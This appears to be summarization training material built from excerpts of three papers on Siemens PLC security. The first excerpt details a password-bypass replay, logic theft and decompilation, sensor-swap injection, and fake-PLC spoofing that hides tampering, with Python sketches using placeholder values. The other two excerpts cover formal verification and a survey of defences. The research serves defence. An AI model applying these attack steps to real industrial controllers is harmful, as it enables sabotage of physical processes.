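Conceptually, such a replay needs nothing more than a raw TCP socket to port 102: wrap each recorded payload in a TPKT header (RFC 1006, the framing used for ISO transport over TCP) and send the payloads in order. The sketch below is a minimal illustration, not the authors' Algorithm 1 (which uses Scapy); the host address and payload bytes are placeholders.

```python
import socket

def tpkt_frame(payload: bytes) -> bytes:
    """Wrap a COTP/S7comm payload in a TPKT header (RFC 1006):
    version 3, reserved 0, 16-bit big-endian total length."""
    total = len(payload) + 4
    return bytes([3, 0, total >> 8, total & 0xFF]) + payload

def replay(payloads, host, port=102, timeout=2.0):
    """Re-send previously captured payloads to the target and collect replies."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        for p in payloads:
            sock.sendall(tpkt_frame(p))
            replies.append(sock.recv(4096))  # naive read; real code reassembles TPKT
    return replies

if __name__ == "__main__":
    captured = [b"\x02\xf0\x80"]  # placeholder, not a real recorded load sequence
    # replay(captured, "192.168.0.1")  # would require a reachable S7-300
```

A faithful implementation would also replay the COTP connection setup and S7 session negotiation before the recorded load-process packets.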
7. https://www.aquariumspecialty.com/aqua-medic-dc-runner-1-2-pump.html

Technically, when a password is written to an S7-300 PLC, it is actually embedded in the SDB block, which is defined by the static bytes 0x3042, precisely in the block number 0000: 0x30303030, as shown in figure 3 [17]. Therefore, before any function or command is executed, the load process first checks the SDB0 block (0x304230303030) to see if a password is already set. We have here two cases: 1) The PLC has no password, and we can easily set a new password by sending an old captured load-process sequence between the PLC and the TIA Portal which contains the setting of a new password. 2) The PLC already has one, and we want either to update it with a new one or to remove the password altogether. In this work we are only interested in the second case, i.e., when the PLC is already password protected.

Fig. 3: S7-300 PLC memory structure

For this scenario the block SDB0 contains a password, and to update/remove the password, the old password must always be supplied by the user before any changes are made. When the legitimate user updates the PLC with a new password, the PLC cannot overwrite the new password in SDB0 directly. This means the PLC first needs to clear this block of its previous content, and then writes the new password into the block. This interesting finding triggered the idea that we can manipulate the setting of the password using the sequence of an old load process captured while updating an old password with a new one. To achieve this, we did the following: we first opened the TIA Portal and changed the password in the configuration settings of the PLC. Then we downloaded the new configuration to the PLC, providing the old password as in a regular operation. In parallel, we recorded the entire load process between the TIA Portal and the PLC using Wireshark as a network sniffer.
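Since the SDB0 marker 0x304230303030 is just the ASCII string "0B0000", the packets of a recorded load process that address SDB0 can be picked out by scanning each payload for that marker. A minimal sketch under an assumed data shape (the capture is modeled as a plain list of payload byte strings; real code would first parse a pcap, e.g. with Scapy's rdpcap):

```python
# 0x30='0', 0x42='B': block type SDB followed by block number 0000.
SDB0_MARKER = bytes.fromhex("304230303030")  # ASCII "0B0000"

def touches_sdb0(payload: bytes) -> bool:
    """True if a payload references block SDB0."""
    return SDB0_MARKER in payload

def filter_sdb0_packets(payloads):
    """Keep only the packets of a recorded load process that address SDB0
    (e.g. the delete-block request), dropping the rest."""
    return [p for p in payloads if touches_sdb0(p)]

# Toy capture: one packet addressing SDB0, one unrelated packet.
capture = [b"\x32\x01" + SDB0_MARKER, b"\x32\x07\x00\x00"]
print(len(filter_sdb0_packets(capture)))  # -> 1
```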
After recording the load process, we filtered the resulting packets, keeping only the packets that are in charge of deleting the content of block SDB0 and ignoring the rest of the packets, which write the new password into SDB0. Similar to what Beresford presented in [14], we created our own load session by replacing the corresponding packets for updating a new password with only those needed to delete block SDB0, and eventually pushed our crafted packet sequence back to the target PLC as a new load process.

Fig. 2: High-level overview of our attack scenarios

After the replay attack was done, we found that the PLC got updated and is no longer password protected. Algorithm 1 describes the core of our Python script used to perform this attack. Our script is based on Scapy features and is not only used to bypass the authentication of the PLC, but also to perform the different replay attacks presented in the next subsections by substituting the corresponding captured/crafted packets.

B. Stealing the Bytecode from the PLC
After the security measures are compromised, we communicate with the exposed PLC using the Python-snap7 library and request the control logic running on the target device. This step is easily done by using the function full_upload(type, block number) from the Python-snap7 library. For our example application, we successfully managed to upload the program running on the PLC to the attacker machine by setting the above-mentioned function's parameters to the corresponding block name and number, i.e., we set the parameters to OB and 1, respectively.

C. Decompiling the Bytecode to STL Code
In the next step, the bytecode set and the corresponding STL instruction set of the user program running on the PLC need to be identified.
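Before turning to the division method, the upload step of section B can be sketched with python-snap7. This is a hedged sketch, not the authors' script: the IP address and rack/slot values are assumptions, parameter conventions vary between python-snap7 versions, and it obviously needs a reachable S7-300 to run.

```python
# Block-type names commonly accepted by snap7 upload functions (assumption).
VALID_BLOCK_TYPES = ("OB", "DB", "SDB", "FC", "SFC", "FB", "SFB")

def check_block_type(block_type: str) -> str:
    """Reject block-type names the wrapper does not know about."""
    if block_type not in VALID_BLOCK_TYPES:
        raise ValueError(f"unknown block type: {block_type}")
    return block_type

def upload_block(ip, block_type="OB", block_num=1, rack=0, slot=2):
    """Fetch one control-logic block from an S7-300 over ISO-TSAP (TCP port 102)."""
    import snap7  # deferred import: only needed when a PLC is actually reachable
    client = snap7.client.Client()
    client.connect(ip, rack, slot)
    try:
        data, size = client.full_upload(check_block_type(block_type), block_num)
        return bytes(data[:size])
    finally:
        client.disconnect()

if __name__ == "__main__":
    # bytecode = upload_block("192.168.0.1", "OB", 1)  # needs a live S7-300
    pass
```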
To achieve this, we applied an offline division method to extract all the instructions used in our program one by one, as follows. We opened the TIA Portal software and programmed our target PLC with a certain code consisting of 10 repetitions of the same instruction. Here, we used the instruction NOP 0, which has no effect on the program. After that we downloaded this code to our PLC and recorded the packets containing the bytecode, which is the representation of the 10 NOP 0 instructions, as shown in figure 4a. We could identify that each NOP 0 instruction is represented as 0xF000 in the bytecode. Afterwards we opened the normal program (used in our example application) in the TIA Portal software, inserted NOP 0 before and after each instruction, and then downloaded the new program to the PLC. We recorded the packets that contain this new bytecode, and identified the hex bytes representing each instruction, as shown in figure 4b. After extracting all instructions with their corresponding hex bytes, we created a small mapping database of pairs, hex bytes to their corresponding STL instructions, and used this mapping database to convert the original machine bytecode to its STL source code online. Although our mapping database is limited to the instructions used in our program, this method could be extended to map all hex bytes to their STL instructions for any control logic program. Figure 5 presents the online mapping process, which takes the content of the code block (OB1) as input and utilizes the created mapping database to retrieve the STL logic program, while figure 6 shows the S7 upload message captured by the attacker machine and the corresponding STL instructions on the TIA Portal station.

D. Infecting the control logic code
After successful decompiling, an attacker now has sufficient knowledge of the control process running on the PLC, and corrupting the system is as easy as replacing one or more instructions with new ones. In our case, the program has two outputs (2 pumps), and modifying any switch/sensor status that a pump reads will corrupt the physical process and make the system work incorrectly. For example, for aquarium 1 in our example application, swapping the low sensor switch %I4.4 (normally open) with the high sensor switch %I4.3 (normally closed) will confuse the process, as pump 1 turns off and on before the water reaches the required levels. This could lead to physical damage in a real industrial system. Figure 7 shows that the user and attacker bytecodes captured by Wireshark differ in only four bytes. Please note that in this scenario the infected code size remains the same as the original, as we just swapped instructions without adding any new ones, i.e., the code size was not increased and the cycle time remains the same when executing the attacker code.

(a) NOP instruction and the corresponding bytecode (b) Inserting NOP instructions in the bytecode
Fig. 4: An example of the NOP division method

Fig. 5: The mapping process from machine bytecode to STL source code

It is worth mentioning that an attacker might skip the decompiling process and just replace the original machine code with a totally new one, even without knowing the program that the PLC runs. This holds true only if there are no security means implemented which check for changes in the code size, cycle time, etc. Our method can cope with such protection mechanisms, but on the other hand the ICS operator can easily detect this attack if he requests and compares the online code running in the infected PLC with the offline code that he has on the TIA Portal.
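The mapping database and the four-byte swap can be mimicked offline. In the sketch below, only the NOP 0 ↔ 0xF000 pair is taken from the paper; every other opcode, the operand encodings for %I4.3/%I4.4, and the uniform two-byte instruction width are made-up simplifications for illustration (real MC7 instructions are not all the same width).

```python
# Hypothetical mapping database: hex words -> STL mnemonics.
# Only 0xF000 = "NOP 0" comes from the paper; the rest are invented examples.
MAPPING_DB = {
    b"\xf0\x00": "NOP 0",
    b"\x10\x43": "A %I4.3",   # placeholder encoding
    b"\x10\x44": "A %I4.4",   # placeholder encoding
}

def decompile(bytecode: bytes):
    """Translate bytecode to STL, assuming two bytes per instruction word."""
    words = [bytecode[i:i + 2] for i in range(0, len(bytecode), 2)]
    return [MAPPING_DB.get(w, f"UNKNOWN {w.hex()}") for w in words]

def swap_operands(bytecode: bytes, a: bytes, b: bytes) -> bytes:
    """Swap every occurrence of word a with word b (and vice versa),
    leaving the code size, and hence the cycle time, unchanged."""
    out = bytearray()
    for i in range(0, len(bytecode), 2):
        w = bytecode[i:i + 2]
        out += b if w == a else a if w == b else w
    return bytes(out)

original = b"\xf0\x00\x10\x43\x10\x44\xf0\x00"
infected = swap_operands(original, b"\x10\x43", b"\x10\x44")
print(decompile(infected))  # -> ['NOP 0', 'A %I4.4', 'A %I4.3', 'NOP 0']
```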
E. Advanced Stealthy Injection Attack
To overcome the challenge of keeping an ongoing injection attack hidden, we present a new method based on replacing the infected PLC with a fake one displayed to the ICS operator. Technically, the TIA Portal provides the user with the ability to compare the online code running in the remote PLC with the offline one that the user has at the control center. This reveals any infection of the control logic.

Fig. 6: S7 upload message: mapping the bytecode to STL instructions
Fig. 7: Modifying the PLC's bytecode

The main goal of our approach is to hinder the operator from uploading the actual infected code from the remote PLC by redirecting his connection to our fake PLC, which sends the uninfected version that we want the user to see. This hides our ongoing injection and achieves a fully stealthy attack. This scenario can be realized using our MITM system (see figure 2), which is initiated after the attacker has penetrated the ICS network and can send/receive messages to/from the TIA Portal/PLC remotely.

1) Impersonating a real PLC: An interesting fact that we found in our investigation is that the ICS operator can be tricked into connecting to a fake PLC (the attacker machine) impersonating the real remote device. This is possible because of an existing vulnerability in the PN-DCP protocol (data link layer). The PN-DCP protocol is basically used for discovering devices or configuring device names, IP addresses, etc. The TIA Portal requests all accessible devices in the network by broadcasting a certain packet called "identify all", and all available S7 PLCs reply with a certain response packet called "identify ok". The payload of the response packet sent by each PLC contains all details of the device, e.g., the name, IP address, vendor name, subnets, etc.
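Crafting the spoofed "identify ok" response amounts to taking the recorded response of the real PLC and rewriting the IP-parameter bytes. A byte-level sketch under assumptions: the payload is treated as an opaque byte string and the IP is simply located and substituted; a faithful implementation would rebuild the DCP IP-parameter block (and its length fields) properly, e.g. with Scapy's Profinet DCP layers.

```python
import ipaddress

def spoof_identify_ok(real_response: bytes, real_ip: str, fake_ip: str) -> bytes:
    """Return a copy of a captured PN-DCP 'identify ok' payload with the
    device IP rewritten, so the TIA Portal registers the attacker's machine."""
    old = ipaddress.IPv4Address(real_ip).packed   # 4-byte big-endian encoding
    new = ipaddress.IPv4Address(fake_ip).packed
    if old not in real_response:
        raise ValueError("recorded response does not contain the expected IP")
    return real_response.replace(old, new)

# Toy captured payload: some surrounding bytes around the encoded IP 192.168.0.1.
captured = b"\xfe\xff\x05\x00" + bytes([192, 168, 0, 1]) + b"\x00\x00"
crafted = spoof_identify_ok(captured, "192.168.0.1", "192.168.0.3")
print(bytes([192, 168, 0, 3]) in crafted)  # -> True
```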
In this work, we aim at blocking the TIA Portal from reaching the remote PLC and connecting it to a fake PLC instead. This is done as follows: we recorded both the "identify all" and "identify ok" packets between the TIA Portal and the remote PLC during an old session, then modified the response packet of the real PLC, replacing the IP address of the PLC (192.168.0.1) with the IP address of our fake PLC (192.168.0.3). For a real scenario, we first implement our MITM system between the TIA Portal and the target PLC, so all packets transferred between the two remote stations first go through our MITM system and are then redirected depending on the attacker's ARP table (ARP poisoning attack). Afterwards our MITM system sends an "identify all" packet through the network (see figure 8a), and the remote PLC responds by sending the "identify ok" packet back to the attacker, as shown in figure 8b. Once the TIA Portal sends a new "identify all" packet through the network in an attempt to connect with the remote PLC, our MITM system listens to the network, identifies the request and drops the packet to prevent the real PLC from responding, and then sends our crafted "identify ok" packet back to the TIA Portal, as shown in figure 8c. Thus, the TIA Portal registers our fake PLC as the real PLC located at 192.168.0.3. Please note that the only difference between the real and crafted "identify ok" packets is the IP address. The next step the legitimate user takes after finding an accessible PLC (which is in fact our fake PLC) is that he attempts

(a) Identify all request message from the attacker to the PLC
(b) Identify ok response message sent from the PLC to the attacker
(c) Identify ok response message sent from the attacker to the TIA Portal
Fig.
8: PN-DCP protocol messages

to establish an online session by initiating a TCP connection. Our MITM system redirects the request to our fake PLC's IP address and establishes a TCP connection with the TIA Portal. After a successful connection, we need to keep the session between the TIA Portal and our fake PLC alive. Our investigation of this problem showed that S7-300 PLCs keep the online session with the TIA Portal alive by exchanging four specific packets (1. S7Comm POSCTR: [Request], 2. S7Comm POSCTR: [Response], 3. COTP TPDU (0), 4. TCP [ACK]) for as long as the user is online. This means that we only need to keep sending the two PLC response packets (S7Comm [Response] & TCP [ACK]), which are sufficient to keep our connection with the TIA Portal alive. The ICS operator could potentially spot the abnormality if he checks the difference in the IP addresses of the real PLC and the fake PLC. As shown in figure 9, the IP addresses of the real PLC and our fake PLC displayed in the TIA Portal differ. But in normal operation this impersonation might go undetected, as the IP address is only shown if the operator explicitly checks the details of the Profinet interface, which is not required during an ongoing operation.

2) Transferring the original logic to the TIA Portal: As we mentioned earlier, once the ICS operator suspects that the remote PLC runs a different logic program than it should, he will request the current logic program (online program) and compare it with the one that he has in the TIA Portal (offline program). This allows him to detect any potential infection/modification. To defeat this security check, we recorded an old upload session between the TIA Portal and the remote PLC, and then modified the packets captured during the security check to carry the original code instead of the

(a) CPU's online diagnostic before the attack
(b) CPU's online diagnostic after the attack
Fig.
9: Different IP addresses shown in the TIA Portal

infected code. For a real scenario, once the ICS operator sends a new upload request over the network, our MITM system drops this request and sends our crafted load sequence back using the Python script presented in algorithm 1. We successfully managed to upload the original code from the attacker machine to the TIA Portal while the PLC runs different code. This stealthy attack could cause significant harm in the relevant ICSs, as the offline and online programs match fully and the engineer will not detect our ongoing injection attack unless he checks the IP address of the connected device in the Profinet interface. Figure 10 shows that both the offline and online programs are identical during our ongoing injection attack.

Fig. 10: Online and offline control logic comparison shown in the TIA Portal

V. DISCUSSION AND FUTURE WORK
In this paper, we presented an advanced stealthy attack scenario for infecting the control logic, including vulnerability exploitation, decompilation, injection, and concealment of the infection via a fake-PLC approach. For a practical implementation we performed all our attack scenarios on real hardware/software used in industrial settings. We found that the ICS operator is able to detect this attack only if he checks the IP address of the connected device, taking into account that he needs to check the details of the Profinet interface, which is normally not required during an ongoing control operation. However, to mitigate the effect of such attacks we suggest some countermeasures, such as protection and detection of control logic tampering. The first step to protect systems from various sorts of attacks is to improve the isolation from other networks [15], combining this with standard security practices [16] and even defence-in-depth security in the control systems. In addition, a digital signature should be employed not only for the firmware, as most PLC vendors do, but also for the control logic. Furthermore, a mechanism to check the protocol header, which contains information about the type of the payload, is also recommended as a solution to detect and block any potential unauthorized transfer of the control logic. Finally, Siemens provides its devices with a Multi-Point Interface (MPI) to communicate with other devices from the SIMATIC family. The MPI protocol is also used as a programming protocol and allows the TIA Portal to upload/download the control logic to/from the PLCs. This protocol is so far not supported by any network sniffer and thus still provides more secure communication between the control center and the remote devices. This helps to prevent attackers from snooping, which in turn improves security, as listening to and capturing packets transferred over the network is the main basis for most attacks against ICSs. The exploits in this paper are efficient but not at all complicated, as S7-300 PLCs still use the old version of the S7 protocol, which lacks security mechanisms compared to the newer version (S7comm Plus) used by modern S7 PLCs, e.g., S7-1200/1500. So in future work we will investigate whether our stealthy attack can be run successfully against modern S7 PLCs. We are aware of the fact that this will be more challenging, as S7comm Plus supports improved security, implementing anti-replay mechanisms and integrity checks.
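The digital-signature countermeasure can be illustrated with a keyed MAC over the control-logic blob: the engineering station tags each downloaded block, and the operator (or a monitoring device) recomputes the tag on upload, so a same-size, four-byte swap like the one in section IV-D is caught even though code size and cycle time are unchanged. A minimal sketch using Python's standard library; HMAC-SHA256 with a hard-coded demo key stands in for a real signature scheme with proper key management.

```python
import hmac, hashlib

KEY = b"demo-key-held-by-the-engineering-station"  # illustrative only

def sign_logic(bytecode: bytes) -> bytes:
    """Tag a control-logic block so later tampering is detectable."""
    return hmac.new(KEY, bytecode, hashlib.sha256).digest()

def verify_logic(bytecode: bytes, tag: bytes) -> bool:
    """Constant-time check of an uploaded block against its stored tag."""
    return hmac.compare_digest(sign_logic(bytecode), tag)

original = b"\xf0\x00\x10\x43\x10\x44\xf0\x00"
tag = sign_logic(original)
infected = b"\xf0\x00\x10\x44\x10\x43\xf0\x00"  # same length, four bytes swapped
print(verify_logic(original, tag), verify_logic(infected, tag))  # -> True False
```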
Summary:
Industrial control systems (ICSs) consist of programmable logic controllers (PLCs) which communicate with an engineering station on one side and control a certain physical process on the other. Siemens PLCs, particularly S7-300 controllers, are widely used in industrial systems, and modern critical infrastructures rely heavily on them. Unfortunately, security features are largely absent in such devices, or are ignored/disabled because security is often at odds with operations. As a consequence of the already reported vulnerabilities, it is possible to leverage PLCs and perhaps even the corporate IT network. In this paper we show that S7-300 PLCs are vulnerable and demonstrate that exploiting the execution process of the logic program running in a PLC is feasible. We discuss a replay attack that compromises password-protected PLCs; then we show how to retrieve the bytecode from the target and decompile the bytecode to STL source code. Afterwards we present how to conduct a typical injection attack, showing that even a very tiny modification in the code is sufficient to harm the target system. Finally we combine the replay attack with the injection approach to achieve a stronger attack, the stealth program injection attack, which can hide the previous modification by engaging a fake PLC impersonating the real infected device. For real scenarios, we implemented all our attacks in a real industrial setting using an S7-300 PLC. We eventually suggest mitigation approaches to secure systems against such threats.
|
Summarize:
I. INTRODUCTION
Processors are becoming more and more important in the world. Today processors can be seen almost everywhere, and in the future they will only become more abundant. There are also many types of computers, such as microcontrollers, distributed control systems (DCSs), and regular personal computers. However, most factories use programmable logic controllers (PLCs) for system control. While these are not very fast, they are very reliable, being able to run 24 hours a day, seven days a week, for many years. This is important because a single crash in the program could cause irreversible damage to the system, factory, or materials. Most PLCs are programmed using ladder logic because of its intuitive and simple environment. PLCs were first seen in the early 1970s performing simple control tasks. They were physically separated from the rest of the world, and in order to install a new program, an engineer would have needed to physically go to the PLC and install the new program. One unintended benefit of this method was that attacking a PLC was infeasible, as an attacker would also need physical access to the system. However, as industrial systems have become more connected through networks and the Internet, security has not kept pace, allowing easier access to engineers and attackers alike. One well-known attack was Stuxnet, which was made to disable Iranian centrifuges [1]. One method of detecting and preventing problems in PLC programs is to install additional software on the PLC which would check all running programs. However, this is expensive and difficult in systems which require very precise timing, with which additional software could interfere. In addition, it would impose a large computational burden on the PLC. Another method, explored in [2], [3], and [4], is to use formal verification to detect malicious or faulty PLC programs.

978-1-5386-1539-3/17/$31.00 ©2017 IEEE
This paper extends this method by identifying certain security vulnerabilities in ladder logic programs. The formal verification for this paper was done in NuSMV [6], [7]. NuSMV allows for modeling a finite state machine (FSM) and checking computational tree logic (CTL) specifications and linear temporal logic (LTL) specifications on the model. If a specification is not true in all possible paths through the FSM, NuSMV shows a counterexample of one of those paths. This paper uses CTL specifications instead of LTL specifications because CTL can be more specific than LTL.

II. PROGRAM DESIGN
In order to show that a PLC ladder logic program can be modeled in NuSMV, a simple program was designed to be implemented in ladder logic and NuSMV. This program controls a virtual crane arm. The arm continuously moves in an upside-down U-shape from the bottom rear position, where it grabs an object, to the bottom front position, where it releases the object, as seen in Fig. 1. In addition to this movement, a few inputs were added for controlling the program. The arm stops after it picks up or drops off the object and waits for the operator to select the next action. There is also a pause button that stops all actions until the program is continued. This program was roughly based on the program discussed in [2]. In table I, the si represent the possible states of the arm, the ai represent the actions, and the ii represent the internal control variables. The logic for controlling the arm can be seen in (1)-(13):

s0 = (((s1·a0) + s0)·a1) + i4    (1)
s1 = ((s0·a1) + s1)·a0·i4        (2)
s2 = ((s3·a2) + s2)·a3·i4        (3)
s3 = (((s2·a3) + s3)·a2) + i4    (4)
s4 = (((s5·a4) + s4)·a5) + i4    (5)
s5 = ((s4·a5) + s5)·a4·i4        (6)
a0 = s2·i1·s0·i2·i4              (7)
a1 = s2·i0·s1·i2·i4              (8)
TABLE I: ARM CONTROL VARIABLES
Name       Variable    Name       Variable
front      s0          downward   a3
rear       s1          opening    a4
top        s2          closing    a5
bottom     s3          topick     i0
open       s4          toplace    i1
closed     s5          paused     i2
forward    a0          ready      i3
backward   a1          start      i4
upward     a2

Fig. 1. Arm Operation

a2 = ((s0·i0) + (s1·i1))·s2·i2·i4    (9)
a3 = ((s1·i0) + (s0·i1))·s3·i2·i4    (10)
a4 = s3·s0·i1·s4·i2·i4               (11)
a5 = s3·s1·i0·s5·i2·i4               (12)
i3 = (s5·i0) + (s4·i1) + (i3·i0·i1) + i4    (13)

Because there are only certain tracks that the arm can move along, only one action should be true at once; otherwise damage would be caused to the arm. Also, if the opening action is true while the bottom state is false, that means that the arm is dropping the object, which could damage the object.

III. LADDER LOGIC IMPLEMENTATION
The implementation of this program in ladder logic can be seen in Fig. 2. For the sake of presentation, the rungs in this figure are not necessarily in the same place as they are in the actual program. These are the rungs that are changed for the intrusions in section VI. In this program, the actions are represented with TON blocks. These timers running represent the actuator motors running on the arm. The timers all run for 2000 milliseconds. Also, any state variable si that uses an action variable ai does not become true until the timer is done timing. For example, front becomes true only after forward is done timing.

IV. NUSMV IMPLEMENTATION
For the purpose of comparison with Fig. 2, the corresponding NuSMV can be seen in Fig. 3. The line numbers are just for reference and are not necessarily the same as in the actual program. This model implements the same logic equations as the ladder logic. The only thing that is different from the ladder logic is the way that the operator inputs are modeled. Instead of being nondeterministic, the inputs are only selected when it makes sense for them to be selected. For example, the start input is selected only at the very beginning, when the arm is not in any state.
This change was made because the model checker should assume that the operator will select the correct inputs, and check only for problems caused by malicious code, not user incompetence. In addition, the pause button is never selected, because otherwise the model checker could falsely determine that the program is frozen when in reality it is just paused. This can be done because the pause button would only be used in extreme situations. Also, because it is only a change to one rung, it can easily be tested separately.

V. CTL SPECIFICATIONS
The CTL specifications that were used to test this model can be seen in Fig. 4. The line numbers are just for reference and are not necessarily the same as in the actual program. These are the variables that change for one of the intrusions looked at in section VI. The specification starting on line 1 checks that the crane arm can always continue moving through every position. If this specification is false, there is at least one position that is unreachable by the arm. The specification starting on line 4 checks that the arm can always move in at least one direction. If this specification is false, the arm is stuck in the same position forever. The specification starting on line 6 checks that at most one motor is running at once. If this is not the case, then either the arm is moving in more than one direction at once, dropping the object when it is not supposed to, or gripping before it is in the correct position to pick up the object. To determine which of these problems is occurring, the counterexample generated by NuSMV should be examined. If one of the actions is opening, then it is dropping the object; if one is closing, then it is gripping without picking up the object; otherwise it is moving in more than one direction at once. The specification starting on line 18 checks that any motor which starts running eventually stops running.
If this is not true, it means one motor is running forever, which could cause damage to the arm. The specification starting on line 23 checks that a state variable si does not change without a timer finishing. If this happened, it would mean that a state variable could change without the position actually changing.

VI. FORMAL VERIFICATION OF THE SELECTED INTRUSIONS

In order to test the CTL specifications, several intrusions were modeled into the NuSMV model one at a time. These intrusions were found to cause six malfunctions in the operation of the arm. There are also three types of intrusion that do not cause any of the CTL specifications to become false.

Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:26 UTC from IEEE Xplore. Restrictions apply.

Fig. 2. Selection from ladder logic implementation of arm program

The six malfunctions are the following:
1) The arm freezes with all timers stopped.
2) The arm tries to move in more than one direction at once.
3) The arm drops the object early.
4) The arm grips early.
5) The arm freezes with a timer running.
6) A state variable changes without a timer finishing.

In the first malfunction, the whole program freezes. This can be seen by changing a0 to its complement in (1). The correct version of this equation is implemented in rung 0 of Fig. 2 and lines 1-5 of Fig. 3. This type of intrusion causes the first and second CTL specifications to be false. In the second malfunction, the arm tries to move in more than one direction at the same time. This can be seen by changing s2 to its complement in (7). The correct version of this equation is implemented in rung 2 of Fig. 2 and lines 11-15 of Fig. 3. This type of intrusion causes the third CTL specification to be false. However, the counterexample generated by NuSMV needs to be examined to differentiate this from malfunctions 3 and 4. In the third malfunction, the arm releases the object early. This can be seen by changing s3 to its complement in (11).
The correct version of this equation is implemented in rung 3 of Fig. 2 and lines 16-20 of Fig. 3. This type of intrusion causes the third CTL specification to be false.

Fig. 3. Selection from NuSMV implementation of arm program

Fig. 4. The CTL specifications used for the arm model

In the fourth malfunction, the arm grips early. This can be seen by changing s3 to its complement in (12). The correct version of this equation is implemented in rung 4 of Fig. 2 and lines 21-25 of Fig. 3. This type of intrusion causes the third CTL specification to be false. In the fifth malfunction, the arm freezes with a timer running; this can be seen by changing the time that any timer runs to a very large value. This type of intrusion causes the fourth CTL specification to be false. In the sixth malfunction, a state variable changes without a timer finishing; this can be seen by changing the duration of any timer to 0 milliseconds. This type of intrusion causes the fifth CTL specification to be false.

The three types of intrusions that do not cause any CTL specifications to be false are the following:
1) The change has a negligible effect on the operation of the arm.
2) The program continues before the user selects the next action.
3) The program is not able to be paused.

The first effect can be seen by changing s0 to its complement in (2). The correct version of this equation is implemented in rung 1 of Fig. 2 and lines 6-10 of Fig. 3. While this change does slightly change the program, it does not change the operation of the arm. The second effect can be seen by changing the input for the next action. Because this is not a direct change to the logic, none of the equations are changed.
However, the change can be seen in rung 5 of Fig. 2 and lines 26-30 of Fig. 3. The third effect can be seen by adding a dummy variable in rung 6 of Fig. 2 and line 33 of Fig. 3 such that i2 is always false. This does not cause any CTL specification to be false, because it was assumed that the program would never be paused anyway. This type of effect should be checked for manually because of that assumption.

VII. CONCLUSION

The purpose of this paper was to show that a PLC ladder logic program can be modeled and verified in NuSMV, and that CTL specifications can be used to detect faulty ladder logic programs before they cause damage to the system. To do this, a simple example program was designed to control a virtual crane arm. The logic for this program was implemented in ladder logic for the PLC and modeled in NuSMV. Several intrusions were introduced into the NuSMV model one at a time, and CTL specifications were used to determine if and how each model was intruded. Six malfunctions were found.

ACKNOWLEDGMENT

This work is supported by the National Science Foundation's REU Site grant (NSF CNS #1560434).
Summary:
Programmable logic controllers (PLCs) are heavy-duty computers used to control industrial systems. For many years these systems were physically separated from any other network, making attacks extremely difficult. However, these increasingly connected systems have not improved much in terms of security, leaving them vulnerable to attacks. This paper attempts to show that ladder logic programs for PLCs can be modeled in NuSMV and verified using computational tree logic (CTL) specifications. This paper also shows how simple changes to the ladder logic program can cause catastrophic damage to the PLC system. This intruded code can be difficult to detect by looking at the ladder logic program because the change is so small. However, the intruded code can be modeled in NuSMV and identified by properly written CTL specifications.
Summarize:
Index Terms—PLC, attack, formal verification

1. Introduction

Industrial control systems (ICS) are subject to attacks sabotaging the physical processes, as shown in Stuxnet [33], Havex [46], TRITON [31], Black Energy [8], and the German Steel Mill [63]. PLCs are the last line of control and defense for these critical ICS systems. However, in our analysis of Common Vulnerabilities and Exposures (CVEs) related to control logic, we have seen a fast growth of vulnerabilities in recent years [86]. These vulnerabilities are distributed across vendors and domains, and their severity remains high. A closer look at these vulnerabilities reveals that the weaknesses behind them are not novel. As Figure 1 shows, multiple weaknesses recur across different industrial domains, such as stack-based buffer overflow and improper input validation. We want to understand how these weaknesses have been used in different attacks, and how existing solutions defend against the attacks. Among various attacks, control logic modification attacks cause the most critical damage. Such attacks leverage the flaws in the PLC program to produce undesired states. As a principled approach to detecting flaws in programs, formal verification has long been used to defend against control logic modification attacks [24], [26].

Figure 1: The reported common weaknesses and the affected industrial sectors. The notation denotes the number of CVEs.

It benefits from several advantages that other security solutions fail to provide. First, PLCs have to strictly meet real-time constraints in controlling the physical processes. This makes it impractical for heavyweight solutions to perform a large amount of dynamic analysis. Second, the physical processes are often safety-critical, meaning false positives are intolerable. Formal verification is lightweight, accurate, and suitable for graphical languages, which are commonly used to develop PLC programs.
Over the years, there have been extensive studies investigating control logic modification attacks and formal verification-based defenses. To understand the current research progress in these areas, and to identify open problems for future research directions, we performed a systematization of current studies.

Scope of the paper. We considered studies presenting control logic modification attacks through modifying program payload (i.e. program code), or feeding special input data to trigger program design flaws. We also considered studies presenting formal verification techniques to protect the affected programs, including behavior modeling, state reduction, specification generation, and verification. Formal verification of network protocols is out of the scope of the paper. We selected the literature based on three criteria: (1) the study investigates control logic modification attacks or formal verification-based defenses, (2) the study is impactful considering its number of citations, or (3) the study discovers a new direction for future research.

Systematization methodology. Our systematization was based on the following aspects. We use attack to denote control logic modification, and defense to denote formal verification-based defense.

Threat model: this refers to the requirements and assumptions to perform the attacks/defenses.
Security goal: this refers to the security properties affected by attacks/defenses.
Weakness: this refers to the flaw triggered to perform the attacks.

2021 IEEE European Symposium on Security and Privacy (EuroS&P). 2021, Ruimin Sun. Under license to IEEE. DOI 10.1109/EuroSP51992.2021.00034. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply.
Detection to evade: this refers to the detection that fails to capture the attacks.
Challenge: this refers to the challenges in defending against the attacks, the advance of attacks, and the insufficiency of defenses.
Defense focus: this refers to the specific research topic in formal verification, e.g. behavior modeling, state reduction, specification generation, and formal verification.

We found that control logic modification attacks could happen under every threat model and employed various evasive techniques. The attacks have been fast evolving with the system design, through input channels from the sensors, the engineering stations, and other connected PLCs. The attacks could also evade dynamic state estimations and verification techniques by leveraging implicitly specified properties. Multiple attacks [54], [64], [83] even deceived engineering stations with fake behaviors. We also found that applying formal verification has made great progress in improving code quality [97]. However, the majority of the studies investigated ad-hoc formal verification research targeting PLC programs. These studies face challenges in many aspects of formal verification: program modeling, state reduction, specification generation, and verification. We found that many studies manually define domain-specific safety properties and verify them based on a few simple test cases. Despite the limitation of test cases, the implicitness of properties was not well explored, even though such properties have been used to conduct input manipulation attacks [68], [70]. Besides implicit properties, specification generation has seen challenges in catching up with program modeling, to support semantics and rules from new attack surfaces. In addition, the real-time constraint limited runtime verification in supporting temporal features, event-driven features, and multitasking.
The dependency on proprietary and vendor-specific techniques resulted in ad-hoc studies. The lack of open-source tools impeded thorough evaluation across models, frameworks, and real programs of industrial complexity. As a call for solutions to address these challenges, we highlight the need to defend against security issues besides safety issues, and we provide a set of recommendations for future research directions. We recommend future research to pay attention to plant modeling and to defend against input manipulation attacks. We recommend collaboration between state reduction and stealthy attack detection. We highlight the need for automatic generation of domain-specific and incremental specifications. We also encourage more exploration in real-time verification, together with more support in open-source tools, and thorough performance and security evaluation.

